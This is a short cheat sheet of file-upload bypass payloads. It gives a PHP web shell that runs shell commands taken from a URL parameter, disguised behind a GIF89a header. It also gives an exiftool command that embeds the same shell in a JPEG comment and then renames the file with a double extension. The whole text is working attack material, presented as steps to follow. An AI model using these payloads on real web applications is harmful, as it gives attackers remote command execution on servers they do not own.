
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[ 𝗰𝗵𝗮𝗻𝗴𝗲 𝘁𝗵𝗲 𝗳𝗶𝗹𝗲 𝗵𝗲𝗮𝗱𝗲𝗿 𝘁𝗼 𝗚𝗜𝗙𝟴𝟵𝗮 ]

GIF89a;
<?
system($_GET['cmd']);
?>

────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

[ 𝗶𝗻𝗷𝗲𝗰𝘁 𝗽𝗵𝗽 𝗰𝗼𝗱𝗲 𝗶𝗻𝘀𝗶𝗱𝗲 𝗮 𝗶𝗺𝗮𝗴𝗲 𝗳𝗶𝗹𝗲 𝘄𝗶𝘁𝗵 𝗲𝘅𝗶𝗳𝘁𝗼𝗼𝗹 ]


exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' evil.jpg

mv evil.jpg evil.php.jpg

────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
